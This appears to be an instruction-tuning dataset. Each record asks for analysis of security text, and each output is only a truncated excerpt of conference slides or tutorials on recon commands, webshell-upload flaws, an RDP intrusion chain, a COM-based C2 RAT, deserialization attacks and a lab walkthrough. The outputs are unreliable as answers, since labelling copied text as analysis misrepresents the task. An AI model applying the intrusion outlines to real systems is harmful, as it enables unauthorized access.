{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n# Bug Hunting Methodology and Enumeration ## Summary * [Passive Recon](#passive-recon) * Shodan * Wayback Machine * The Harvester * Github OSINT * [Active Recon](#active-recon) * [Network discovery](#network-discovery) * [Web discovery](#web-discovery) * [Web Vulnerabilities](#looking-for-web-vulnerabilities) ## Passive recon * Using [Shodan](https://www.shodan.io/) to detect similar app ```bash can be integrated with nmap (https://github.com/glennzw/shodan-hq-nse) nmap --script shodan-hq.nse --script-args 'apikey=<yourShodanAPIKey>,target=<hackme>' ``` * Using [The Wayback Machine](https://archive.org/web/) to detect forgotten endpoints ```bash look for JS files, old links curl -sX GET \"http://web.archive.org/cdx/search/cdx?url=<targetDomain.com>&output=text&fl=original&collapse=urlkey&matchType=prefix\" ``` * Using [The Harvester](https://github.com/laramies/theHarvester) ```python python theHarvester.py -b all -d domain.com ``` * Look for private information in [GitHub]() repos with [GitRob](https://github.com/michenriksen/gitrob.git) ```bash gitrob analyze johndoe --site=https://github.acme.com --endpoint=https://github.acme.com/api/v3 --access-tokens=token1,token2 ``` * Perform Google Dorks search ## Active recon ### Network discovery * Subdomains enumeration * Enumerate already found subdomains: [projectdiscovery/subfinder](https://github.com/projectdiscovery/subfinder): `subfinder -d hackerone.com` * Permutate subdomains: [infosec-au/altdns](https://github.com/infosec-au/altdns) * Bruteforce subdomains: [Josue87/gotator](https://github.com/Josue87/gotator) * Subdomain takeovers: [EdOverflow/can-i-take-over-xyz](https://github.com/EdOverflow/can-i-take-over-xyz) * Network discovery * Scan IP ranges with `nmap`, [robertdavidgraham/masscan](https://github.com/robertdavidgraham/masscan) and [projectdiscovery/naabu](https://github.com/projectdiscovery/naabu) * Discover services, version and banners * Review latest acquisitions * ASN enumeration * [projectdiscovery/", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nEditors Vulnerability Handbook  Version 0.0.6  Summary Editors Update Description #Include {FCKeditor} 2010/04/10 \"_\"真不是那么好绕 的~~望高手飞过告 知 #Include {eWebEditor} 2010/02/13 你是否跟我一样讨厌 此物的精简版? #Include {Cuteditor} 2009/11/29 #Include {Freetextbox} 2009/11/29 #Include {Webhtmleditor} 2009/11/29 经过参考诸多资料- 证实此物已终止更新 #Include {Kindeditor} 2009/11/29 v3.4 已经开始 以$Date命名文件名 #Include {eWebEditorNET} 2009/11/29 Aspx版 eWebEditor #Include {southidceditor} 2009/11/29 基于eWebEditor v2.8商业版Kernel #Include {bigcneditor} 2009/11/29 基于eWebEditor v2.8商业版Kernel  Note 创建这样一个文档是为了能够使得众多需要得到帮助的人们在她 们最为困苦之时找到为自己点亮的那盏明灯虽然这将揭示了某个寂静黑 夜下一群躁动不安的人群.他们在享受快感享受H4ck W0r|d带给他们 的一切. 作为收集整理此文的修订者我-怀着无比深邃的怨念参考了诸多资料才 使得此物最终诞生在此感谢整理过程中所有施舍帮助于我的人们.愿他 们幸福快乐虎年如意 *非常希望各位能够与我联系一并完成本文的创作  Redactor [北洋贱队@Bbs.SecEye.Org ~]# MIAO猪 猪哥 哥靓 靓Hell-PhantomLiangeFjhhGxMSn4k3!   Contact GPL License GPL License - 北洋贱队公约 - 北洋贱队公约 FCKeditor.....................................................................7 FCKeditor编辑器页/查看编辑器版本/查看文件上传路径 ............ 7 FCKeditor被动限制策略所导致的过滤不严问题 ....................... 8 利用2003路径解析漏洞上传网马 ........................................ 8 FCKeditor PHP上传任意文件漏洞....................................... 9 FCKeditor JSP上传文件路径............................................. 9 TYPE自定义变量任意上传文件漏洞...................................... 9 FCKeditor 新闻组件遍历目录漏洞 .................................... 10 FCKeditor 暴路径漏洞 .................................................. 10 FCKeditor中webshell的其他上传方式 ............................... 10 FCKeditor 文件上传.变_下划线的绕过方法 .................... 10 eWebEditor ................................................................11 eWebEditor利用基础知识 .............................................. 11 eWebEditor踩脚印式入侵 .............................................. 12 eWebEditor遍历目录漏洞 .............................................. 12 eWebEditor 5.2 列目录漏洞 .......................................... 13 利用WebEditor session欺骗漏洞,进入后台......................... 13 eWebEditor asp版 2.1.6 上传漏洞.......................", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nFinding Xori Malware Analysis Triage with Automated Disassembly Amanda Rousseau Rich Seymour About Us Amanda Rousseau Rich Seymour Sr. Malware Researcher, Endgame, Inc. @malwareunicorn Sr. Data Scientist, Endgame, Inc. @rseymour Quick Overview The Current State of Disassemblers Functionality & Features Brief overview of pros and cons with current popular open source PE disassemblers. Overview how we pulled together the different aspects of disassemblers and emulator Usage & Demo How the output is used for automation. Applying the tool on various malware samples and shellcode. The Problem There are millions of malware samples to look at and a few reverse engineers. We need to change the way we are going about this if we are going to keep up. How to leverage large scale disassembly in an automated way with many samples?  Improve the scalability in malware analysis  Integration and automation Present Day Common Disassemblers Capstone Radare2 IDA Pro Hopper Binary Ninja Size small small large medium large Stability      Price - - $$$ $ $$ Cross Platform  ~    Usability ~ ~  ~ ~ Accuracy ~ ~  ~ ~ Integration  ~    Requirements  Fast development  Stability and resilience  Cross platform  Output can be easily integrated  Ease of use  Core feature set  Output accuracy Evaluating Disassemblers The first step - Diving into the code:  Verifying the accuracy of various disassemblers  Understand each of their strengths and limitations We adopted different aspects of disassemblers and emulator modules.  Much of Capstone is also based on the LLVM & GDB repositories  QEMU is the emulation is straightforward, easy to understand  Converted some of the logic into Rust, while also fixing a few bugs along the way. Evaluating Example \\x66\\x90 XCHG AX, AX [Objdump] X86 32bit: NOP [Capstone] NOP [Distorm] XCHG AX, AX [IDA Pro] OpSize Opcode Developed in Rust Why Rust?  Same capabilities in C\\C++  Stack protection  Proper memory handling (guaranteed memory safety)  Provides stability and sp", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n.\\\" XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX .\\\" DO NOT EDIT! Generated from XML source. .\\\" XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX .de Sh \\\" Subsection .br .if t .Sp .ne 5 .PP \\fB\\\\$1\\fR .PP .. .de Sp \\\" Vertical space (when we can't use .PP) .if t .sp .5v .if n .sp .. .de Ip \\\" List item .br .ie \\\\n(.$>=3 .ne \\\\$3 .el .ne 3 .IP \"\\\\$1\" \\\\$2 .. .TH \"AB\" 1 \"2003-04-29\" \"Apache HTTP Server\" \"ab\" .SH NAME ab \\- Apache HTTP 服务器性能测试工具 .SH \"总览 SYNOPSIS\" .PP \\fBab\\fR [ -\\fBA\\fR \\fIauth-username\\fR:\\fIpassword\\fR ] [ -\\fBc\\fR \\fIconcurrency\\fR ] [ -\\fBC\\fR \\fIcookie-name\\fR=\\fIvalue\\fR ] [ -\\fBd\\fR ] [ -\\fBe\\fR \\fIcsv-file\\fR ] [ -\\fBg\\fR \\fIgnuplot-file\\fR ] [ -\\fBh\\fR ] [ -\\fBH\\fR \\fIcustom-header\\fR ] [ -\\fBi\\fR ] [ -\\fBk\\fR ] [ -\\fBn\\fR \\fIrequests\\fR ] [ -\\fBp\\fR \\fIPOST-file\\fR ] [ -\\fBP\\fR \\fIproxy-auth-username\\fR:\\fIpassword\\fR ] [ -\\fBq\\fR ] [ -\\fBs\\fR ] [ -\\fBS\\fR ] [ -\\fBt\\fR \\fItimelimit\\fR ] [ -\\fBT\\fR \\fIcontent-type\\fR ] [ -\\fBv\\fR \\fIverbosity\\fR] [ -\\fBV\\fR ] [ -\\fBw\\fR ] [ -\\fBx\\fR \\fI<table>-attributes\\fR ] [ -\\fBX\\fR \\fIproxy\\fR[:\\fIport\\fR] ] [ -\\fBy\\fR \\fI<tr>-attributes\\fR ] [ -\\fBz\\fR \\fI<td>-attributes\\fR ] [http://]\\fIhostname\\fR[:\\fIport\\fR]/\\fIpath\\fR .SH \"描述 SUMMARY\" .PP .B ab 是一个测试你Apache http服务器的工具你可以通过这个工具 指定一个单位时间内向apache发出的请求数量来看看你的Apache和机 器配合的性能如何 .SH \"选项 OPTIONS\" .TP -A \\fIauth-username\\fR:\\fIpassword\\fR 支持基本的验证证书,用户名和密码之间使用\"冒号\" : 分隔开,ab将以明文方式传送过去.不管服务器是不是需要 ,也就是说你的服务器需要支持401认证. .TP -c \\fIconcurrency\\fR 同时向服务器端发送的请求数目默认状态下是一次 只执行一个http请求. .TP -C \\fIcookie-name\\fR=\\fIvalue\\fR Add a Cookie: line to the request\\&. The argument is typically in the form of a \\fIname\\fR=\\fIvalue\\fR pair\\&. This field is repeatable\\&. .TP -d Do not display the \"percentage served within XX [ms] table\"\\&. (legacy support)\\&. .TP -e \\fIcsv-file\\fR Write a Comma separated value (CSV) file which contains for each percentage (from 1% to 100%) the time (in milli seconds) it took to serve that percentage of the requests\\&. This is usually more useful than the 'gnuplot", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nACL Steganography: Permissions to Hide Your Porn by Michael Perklin Michael Perklin Corporate Investigator Digital Forensic Examiner Security Professional eDiscovery Administrator Computer Geek + Legal Support hybrid Michael Perklin Diploma in Computer Science Technology Bachelors Degree in Information Systems Security Masters Degree in Information Assurance EnCase Certified Examiner (EnCE) AccessData Certified Examiner (ACE) Certified Information Systems Security Professional (CISSP) In This Talk... What is Steganography? Historical examples of physical and digital forms How do they work? Identifying a Lowest Common Denominator ACL Steganography - a new scheme What Is Steganography? Greek origin and means \"concealed writing\" steganos (στεγανός) meaning \"covered or protected\" graphei (γραφή) meaning \"writing\" The term was first coined in 1499, but there are many earlier examples Basically, hiding something in plain sight Classical Example: Tattoo Tattoo under hair Encoder tattoos a slaves scalp Decoder shaves the messengers hair The message must be delayed to allow time for hair regrowth Tattoos Are Permanent Oops Classical Example: Morse Stitch morse code into a sweater/jacket worn by a messenger Messenger hand-delivers one message while actually delivering two Classical Example: Invisible Ink Write secrets with lemon juice Allow to dry Decode with heat (candle, match, hair dryer, iron) Decode With Heat Digital Example: Photos Files can be encoded as colour information embedded in a photo Most common type of digital steganography Based on the fact that only super-humans can tell the difference between Chartreuse and Lemon Photo Steganography Each pixel is assigned a colour with an RGB colour code The last bit of this 8-bit code is overwritten with encoded data #DFFF00 is chartreuse #DFFF01 is.... one of the yellows 8 adjacent pixels with 8 slightly-adjusted colours allows 1 byte of encoded information Audio Steganography Same principle as photographic steganography, bu", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nDevelopments in Cisco IOS Forensics Felix FX Lindner DEFCON Las Vegas, August 2008 Agenda IP Routing Infrastructure and Cisco IOS Cisco IOS Internals Debugging and Post Mortem Analysis Today A New Analysis Approach Proposal Features Challenges Public Offer Future Work IP Routing Infrastructure The Internet and corporate networks almost exclusively run on the Internet Protocol IP Version 4 is still prevalent protocol IP Version 6 coming up very slowly The design of IP requires intelligent nodes in the network to make routing decisions This is a design principle of the protocol and cannot be changed Flat networks have their own issues IP Infrastructure & Security All security protocols on top of IP share common design goals: Guarantee end-to-end integrity (some also confidentiality) of the traffic Detect modification, replay, injection and holding back of traffic Inform the upper protocol layers None of them can recover from attacks rooted in the routing infrastructure Security protocols cannot influence routing Infrastructure Monoculture Cisco Systems routing platforms form the single largest population of networking equipment today Equivalently distributed in the Internet core, government and corporate networks Many different hardware platforms with different CPUs Large investment sums bound to the equipment Hard to replace All run basically the same operating system Protecting this infrastructure is critical Therefore, in-depth analysis and diagnostics are of paramount importance Cisco IOS Cisco Internetwork Operating System Monolithic operating system Compile-time linked functionality  the 3 dimensional complexity of IOS Platform dependent code Feature-set dependent code Major, Minor and Release version dependent code Several tens of thousands different IOS images used in todays networks Over 10.000 still officially supported Inside Cisco IOS One large ELF binary Essentially a large, statically linked UNIX program Loaded by ROMMON, a kind-of BIOS Runs directly on ", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nBypass firewalls, application white lists, secure remote desktops in 20 seconds Zoltan Balazs DEF CON 22, 2014 root@kali:~# whoami Zoltán Balázs root@kali:~# whoami root@kali:~# whoami AV testing AV bypass root@kali:~# whoami OSCP: Occasional Satire Captain Punk CISSP: Certified Interspecie-ial Sheep Shearing Professional CPTS: Certified Pajama Toaster Specialist MCP: Microsoft Certified Psychopath OSWP: Official Sexiest Weasel Popstar CHFI: Chronic Hopeless Flux Incompetent Im NOT a CEH CyberLympics@2012 CTF 2nd runners up  gula.sh Creator of the Zombie Browser Toolkit https://github.com/Z6543/ZombieBrowserPack Hungary I love hacking How do you hack high security systems? How do you hack high security systems when you are not Tom Cruise? The mission Im a spy (with low budget) I want access to a hardened secure RDP (remote desktop) server E.g. server contains confidential documents I need persistent C&C access to the RDP server To upload/download files Interactive remote code execution The solution (in an ideal world) Infected workstation Secure remote desktop server 1. Infect clients desktop 2. Steal RDP password 3. Connect to RDP 4. Drop malware 5. Command and Control 6. Profit The challenges RDP server is not reachable from the Internet Directly  Two factor authentication is used to access the RDP server No access to the token seeds ;) Drive mapping disabled  no direct file copy Restrictive hardware firewall Allows workstation -> server TCP port 3389 IPv4 only Application white list is used on the RDP server M$ Applocker in my case with default policy Firewall, port 3389 allowed only Is this realistic? Similar environment at a client Had no time to hack it Infected workstation Secure remote desktop server Target Company The Internet Attacker Firewall, port 3389 allowed only In hacking, there is no such thing as impossible. Only things that are more challenging. Already achieved I have remote code execution with C&C on a users workstation I have access to a test R", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n### ELF 文件概述 > 本部分内容来源于 ELF 1.2 标准内容经过一定的修改与整理主要参考文献如下 > > 1. ELF 文件格式分析北京大学滕启明 > 2. ELF-摧毁圣诞 ### ELF 文件简介 ELF Executable and Linkable Format文件也就是在 Linux 中的目标文件主要有以下三种类型 - 可重定位文件Relocatable File包含由编译器生成的代码以及数据链接器会将它与其它目标文件链接起来从而创建可执行文件或者共享目标文件在 Linux 系统中这种文件的后缀一般为 `.o`  - 可执行文件Executable File就是我们通常在 Linux 中执行的程序 - 共享目标文件Shared Object File包含代码和数据这种文件是我们所称的库文件一般以 `.so` 结尾一般情况下它有以下两种使用情景 - 链接器Link eDitor, ld可能会处理它和其它可重定位文件以及共享目标文件生成另外一个目标文件 - 动态链接器Dynamic Linker将它与可执行文件以及其它共享目标组合在一起生成进程镜像 > 关于Link eDitor的命名https://en.wikipedia.org/wiki/GNU_linker 目标文件由汇编器和链接器创建是文本程序的二进制形式可以直接在处理器上运行那些需要虚拟机才能够执行的程序(Java)不属于这一范围 这里我们主要关注于 ELF 的文件格式 ### ELF 文件格式 目标文件既会参与程序链接又会参与程序执行出于方便性和效率考虑根据过程的不同目标文件格式提供了其内容的两种并行视图 首先我们来**关注一下链接视图** 文件开始处是 ELF 头部 **ELF Header**它给出了整个文件的组织情况 如果程序头部表Program Header Table存在的话它会告诉系统如何创建进程用于生成进程的目标文件必须具有程序头部表但是重定位文件不需要这个表 节区部分包含在链接视图中要使用的大部分信息指令数据符号表重定位信息等等 节区头部表Section Header Table包含了描述文件节区的信息每个节区在表中都有一个表项会给出节区名称节区大小等信息用于链接的目标文件必须有节区头部表其它目标文件则无所谓可以有也可以没有 对于**执行视图**来说其主要的不同点在于没有了section而有了多个segment其实这里的 segment 大都是来源于链接视图中的 section 注意: > 尽管图中是按照 ELF 头程序头部表节区节区头部表的顺序排列的但实际上除了 ELF 头部表以外其它部分都没有严格的顺序 ### ELF 文件数据形式 ELF 文件格式支持 8 位/32 位体系结构当然这种格式是可以扩展的也可以支持更小的或者更大位数的处理器架构因此目标文件会包含一些控制数据这部分数据表明了目标文件所使用的架构这也使得它可以被通用的方式来识别和解释目标文件中的其它数据采用目的处理器的格式进行编码与在何种机器上创建没有关系这里其实想表明的意思目标文件可以进行交叉编译我们可以在 x86 平台生成 arm 平台的可执行代码 目标文件中的所有数据结构都遵从自然大小和对齐规则如下 | 名称 | 长度 | 对齐方式 | 用途 | | :------------ | :--: | :--: | :-----: | | Elf32_Addr | 4 | 4 | 无符号程序地址 | | Elf32_Half | 2 | 2 | 无符号半整型 | | Elf32_Off | 4 | 4 | 无符号文件偏移 | | Elf32_Sword | 4 | 4 | 有符号大整型 | | Elf32_Word | 4 | 4 | 无符号大整型 | | unsigned char | 1 | 1 | 无符号小整型 | 如果必要数据结构可以包含显式地补齐来确保 4 字节对象按 4 字节对齐强制数据结构的大小是 4 的整数倍等等数据同样适用是对齐的因此包含一个 Elf32_Addr 类型成员的结构体会在文件中的 4 字节边界处对齐 为了具有可移植性ELF 文件不使用位域 ### ELF Header介绍 ELF Header 描述了 ELF 文件的概要信息利用这个数据结构可以索引到 ELF 文件的全部信息数据结构如下 ```c #define EI_NIDENT 16 typedef struct { unsigned char e_ident[EI_NIDENT]; ELF32_Half e_type; ELF32_Half e_machine; ELF32_Word e_version; ELF32_Addr e_entry; ELF32_Off e_phoff", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nFORENSICS IS ONLY FOR PRIVATE INVESTIGATORS NOW! OR WHO NEEDS CERTIFICATIONS? Scott A. Moulton Forensic Strategy Services, LLC. www.ForensicStrategy.com DISCLAIMER  This is NOT Animated!  Everything I state is my opinion and is based on my research and experiences.  I am not A lawyer!  I am not YOUR lawyer!  Talk to your own lawyer and do your own research.  I am sure that some of you will get angry about this speech and the new laws, but I am not the bad guy.  This is for your Entertainment!  States are passing new laws and implementing them very quickly. These laws can go into effect immediately with no grandfathering of current non-licensed people nor giving them a path to get licensed by the deadlines.  The PI Board in many states is lobbying similar wording and trying to get similar laws passed and shooting for a felony.  Most computer forensic or computer security professional have no idea this is happening at all or believe that it applies to them. WHY IS THIS SPEECH IMPORTANT TO YOU? FOR EXAMPLE: RECENT EVENTS IN MICHIGAN  Michigan passed the Professional Investigator Licensure Act on May 28th 2008.  I makes it a felony to practice computer forensics without a license going into effect: This act is ordered to take immediate effect.  Penalty: (3) A person violating this section is guilty of a felony punishable by imprisonment for not more than 4 years or by a penal fine of not more than $5,000.00, or both. OPINIONS ABOUT THESE LAWS  Some people think regulation is needed.. It gets rid of the rift raft that hangs out a sign  Some think that they would rather have the worst computer guy working on their case more than a current PI and generally believe the PI is not qualified.  And others state that this is a field of science and not surveillance and computer science does not belong under the PI wing.  But a lot more people just think it does not apply to them, such as Forensic Document Handwriting Experts. OTHERS THINK ALL PIS DO IS SURVEILLANCE QUALIFICATION ", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nFriday'the'13th:'JSON'Attacks Alvaro'Muñoz'(@pwntester) Oleksandr Mirosh HPE'Security >\"whoarewe  Alvaro'Muñoz  Security'Research'with'HPE  @pwntester  Oleksandr Mirosh  Security'Research'with'HPE Introduction  2016'was'the'year'of'Java'Deserialization'apocalypse  Known'vector'since'2011  Previous'lack'of'good'RCE'gadgets'in'common'libraries  Apache'Commons-Collections'Gadget'caught'many'off-guard.  Solution?  Stop'using'Java'serialization  Use'a'secure JSON/XML'serializer'instead  Do'not'let'history'repeat'itself  Is'JSON/XML/<Put$your$favorite$format$here>'any'better?  Raise'awareness'for'.NET'deserialization'vulnerabilities Agenda 1. Attacking'JSON'serializers  Affected'Libraries  Gadgets  Demo 2. Attacking'.NET'serializers  Affected'formatters  Gadgets  Demo 3. Generalizing'the'attack  Demo Is'JSON'any'better? Introduction  Probably'secure'when'used'to'transmit'data'and'simple'JS'objects  Replacing'Java/.NET'serialization'with'JSON'requires'OOP'support.  How'do'we'serialize'a'java.lang.Object field?  How'do'we'deal'with'generics?  How'do'we'serialize'interface'fields?  How'do'we'deal'with'polymorphism? Quick\"recap\"of\"Java\"deser attacks  Attackers'can'force'the'execution'of'any'readObject() / readResolve() methods'of'any'class'sitting'in'the'classpath  By'controlling'the'deserialized'field'values'attackers'may'abuse'the' logic'of'these'methods'to'run'arbitrary'code  JSON'libraries'do'not'(normally)'invoke'deserialization'callbacks'or' magic'methods Can'we'initiate'a'gadget'chain'in'some'other'way? Object\"Reconstruction  JSON'libraries'need'to'reconstruct'objects'by'either:  Calling'default'constructor'and'using'reflection to'set'field'values  Calling'default'constructor and'calling'setters to'set'field'values  Calling'special'constructors,'type'converters'or'callbacks  Calling'common'methods'such'as:'  hashcode(), toString(), equals(), finalize(),   Combinations'of'the'previous'ones'J Gadgets:\".NET\"Edition  System.Configuration.Install.AssemblyInstaller  set_Path", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n# 最后一次异常法 最后一次异常法的原理是, 程序在自解压或自解密过程中, 可能会触发无数次的异常. 如果能定位到最后一次程序异常的位置, 可能就会很接近自动脱壳完成位置. 现在最后一次异常法脱壳可以利用Ollydbg的异常计数器插件, 先记录异常数目, 然后重新载入, 自动停在最后一次异常处. ## 要点 1. 点击`选项->调试选项>异常`, 把里面的全部去掉! 按下`CTRL+F2`重载下程序 2. 开始程序就是一个跳转, 在这里我们按`SHIFT+F9`, 直到程序运行, 记下从开始按`SHIFT+F9`到程序运行的次数`m`! 3. `CTRL+F2`重载程序, 按`SHIFT+F9`(这次按的次数为程序运行的次数`m-1`次) 4. 在OD的右下角我们看见有一个\"`SE 句柄`\", 这时我们按`CTRL+G`, 输入`SE 句柄`前的地址! 5. 按F2下断点!然后按`SHIFT+F9`来到断点处, F8单步跟踪 ## 示例 示例程序可以点击此处下载: [5_last_exception.zip](https://github.com/ctf-wiki/ctf-challenges/blob/master/reverse/unpack/example/5_last_exception.zip) OD载入程序, 在菜单`选项->调试设置->异常标签页`中取消勾选所有的忽略异常, 然后重载程序. 我们按下`Shift+F9`, 记录按了多少次, 程序正常运行. 我们要得到的是倒数第二次按下是按了多少次. 在本例中 * `shift+F9`一次, 到了`0040CCD2`的位置 * `shift+F9`两次, 程序正常运行 那么我们重载程序, 只需按下1次(`2-1=1`)`Shift+F9`, 来到`0040CCD2`的位置, 观察堆栈窗口, 这里有一个`SE处理程序: 0040CCD7` 我们在CPU窗口(汇编指令), 按`Ctrl+G`, 输入`0040CCD7`, 然后在此处按下F2. 也就是在`0040CCD7`处设置断点, 然后按下`Shift+F9`运行, 触发断点. 触发断点后, 来单步跟踪. 向下都是一些循环和跳转, 我们使用F4跳过循环. 最后到达如下位置 显然在最后的`mov ebp, 0041010CC; jmp ebp`是在跳转向OEP, 我们跳转过去如下图所示: 显然, 我们幸运地来到了OEP处.", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nKoadic C3 COM Command & Control DEF CON 25 - July 2017 Agenda  Current open-source \"malware\" options for red teams  Koadic (C3)  Advanced JScript/VBScript RAT  The hell we went through  Demos whoami /all  @zerosum0x0  @Aleph___Naught  @JennaMagius  @The_Naterz Red Team @ RiskSense, Inc First things first...  \"SMBLoris\" attack  Windows 0-day denial-of-service SMBLoris Notes  Not responsible for other people's actions  A ton of overlapping research, incremental work  Consolidate research/techniques  \"Advances state of the art\"  Meme slides = dirty hack/workaround  Prototype  Used on real engagements  Submit fixes, not tixes Intrusion Phases  Reconnaissance  Initial Exploitation  Establish Persistence  Install Tools  Move Laterally  Collect, Exfil, and Exploit Source: Rob Joyce, NSA/TAO Director, Enigma 2016 Current State of Windows Post Exploitation  Yet but a few open-source \"malware\" options for red teams  Meterpreter  Cobalt Strike  PowerShell Empire  Roll your own  A decent option- the bad guys do Downsides of PE Malware  Meterpreter is amazing software!  Post-exploitation (and some exploits [psexec]) often involve dropping a binary  Binaries are what AV love  Need to evade payload  Veil Evasion  Shellter Downside of PowerShell  Empire is amazing software!  Requires PowerShell (duh)  Officially- Server 2008 SP2*  Requires modern .NET  Extensive logging/disabling mechanisms * https://msdn.microsoft.com/en-us/powershell/scripting/setup/windows-powershell-system-requirements WTS C3 - COM C&C  Target Win2k SP0  Possibly earlier  JScript/VBScript  Baked directly into the core of Windows  Not an addon-- harder to limit  Powerful COM exposed by the OS  Creative use of default .exe's  Ways to execute completely in memory  The main benefit of PowerShell COM Background  Component Object Model  Language neutral  Object oriented  Binary interface  Distributed  Arguable precursor to .NET  Slightly different goals and implementation  AKA \"still relevant\"?  Found EVERYWHERE in W", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n# Gaara > https://download.vulnhub.com/gaara/Gaara.ova 靶场IP`192.168.2.6` 扫描对外端口服务 ``` (rootkali)-[/tmp] # nmap -p1-65535 -sV 192.168.2.6 Starting Nmap 7.92 ( https://nmap.org ) at 2022-09-04 09:26 EDT Nmap scan report for 192.168.2.6 Host is up (0.00016s latency). Not shown: 65533 closed tcp ports (reset) PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0) 80/tcp open http Apache httpd 2.4.38 ((Debian)) MAC Address: 08:00:27:86:6F:1F (Oracle VirtualBox virtual NIC) Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 7.87 seconds ``` 浏览器访问 ![image-20220904212823485](../../.gitbook/assets/image-20220904212823485.png) 爆破web目录发现`/Cryoserver `目录 ``` (rootkali)-[/tmp] # gobuster dir -u http://192.168.2.6/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt =============================================================== Gobuster v3.1.0 by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart) =============================================================== [+] Url: http://192.168.2.6/ [+] Method: GET [+] Threads: 10 [+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt [+] Negative Status codes: 404 [+] User Agent: gobuster/3.1.0 [+] Timeout: 10s =============================================================== 2022/09/04 09:31:55 Starting gobuster in directory enumeration mode =============================================================== /server-status (Status: 403) [Size: 276] /Cryoserver (Status: 200) [Size: 327] =============================================================== 2022/09/04 09:32:21 Finished =============================================================== ``` 拖到最下面有三个目录 ``` /Temari /Kazekage /iamGaara ``` ![image-20220904213911398](../../.gitbook/assets/image-20220904213911398.png) 访问`/iamGaara` ![image-20220904214017563](../../.gitbook/asset", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nRespond Before Incident Building proactive APT defense capabilities (Public Version)  Introduction  Popular cyber attack countermeasures  Evolution of cyber incident handling  Traditional incident handling challenges  Ideal CSIRT Resource Allocation  Story of a long-term NPO victim  Original Compromised Situation  Attack campaigns and TTPs  Effective Mitigation Cycle  Proactive Defense How-to  Situation Awareness & Visibility Building  Proactive Internal Visibility: Threat Hunting  External Situation Awareness: Threat Intelligence  Intelligence-driven Proactive Defense  Threat Hunting In-action  Network-based & Host-based Threat Hunting  Detecting abnormalities via Modeling  Prioritizing with Threat Intelligence  Intelligence-driven Threat Hunting Cycle  Conclusion: Be Proactive  tt@teamt5.org  Frequent Black Hat / hacker conference speaker  Vulnerability researcher and owner of several CVE ID  10+ years on security product development  8+ years experience on cyber threat research  Organizer of HITCON    Digital Forensics & Incident Response background.  Development of Threat Intel Platform and IR tools.  Hacks in Taiwan Conference (HITCON) committee.  Spoke at some conferences, played some CTF.  gd@teamt5.org Introduction Password Login Firewall Antivirus Malware Supply Chain Email Phishing IDS / IPS Vulnerability / Worm Drive-by Download Sandbox UTM / NGFW EDR / UEBA Network-exploit & Opportunistic  Endpoint-exploit & Targeted  Famous system clean-up software  Official website trojanized for 1 month 2 million user download and infected  Only targeted user will received 2nd stage RAT from github, wordpress  Targets: Intel, Google, Microsoft, Akamai, Sony, Samsung, Vmware, HTC, Linksys, D-Link, Cisco  Kaspersky: similar to APT17 base64 http://blog.talosintelligence.com/2017/09/avast-distributes-malware.html http://blog.talosintelligence.com/2017/09/ccleaner-c2-concern.html https://blog.avast.com/avast-threat-labs-analysis-of-ccleaner-incident  Every vendor thinks it", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nLaboratory for Dependable Distributed Systems  RWTH Aachen University Far More Than You Ever Wanted To Tell Hidden Data In Document Formats Maximillian Dornseif at Defcon 2004, Las Vegas Maximillian Dornseif  Laboratory for Dependable Distributed Systems  RWTH Aachen University Warning  When you read this this slides are probably outdated.  Get the slides used in the presentation at http://md.hudora.de/presentations/#hiddendata-dc  The PDF version has no demos. Go for the Quicktime version, Maximillian Dornseif  Laboratory for Dependable Distributed Systems  RWTH Aachen University The Problem  Complex Dataformats  We are not supposed to understand  or we are not willing to understand  Covert channels everywhere! Laboratory for Dependable Distributed Systems  RWTH Aachen University Examples Maximillian Dornseif  Laboratory for Dependable Distributed Systems  RWTH Aachen University Mail- & News-Headers  RfC 822 and friends are well known in the techie community but a mystery to everybody else.  Data in there possibly include: OS, IP, server, software and their versions, organisation, time, customer number at isp / telephone number (!), etc. Maximillian Dornseif  Laboratory for Dependable Distributed Systems  RWTH Aachen University Incidents  T-Online Maximillian Dornseif  Laboratory for Dependable Distributed Systems  RWTH Aachen University Config Files  Config files which are not well understood are a security issue...  ... but also can result in disclosure of information which is not to be disclosed Maximillian Dornseif  Laboratory for Dependable Distributed Systems  RWTH Aachen University Incidents  Apache  BitchX Maximillian Dornseif  Laboratory for Dependable Distributed Systems  RWTH Aachen University HTML  Complex programs generate complex HTML  Most obvious:  META generator  Paths to local files Maximillian Dornseif  Laboratory for Dependable Distributed Systems  RWTH Aachen University Incidents  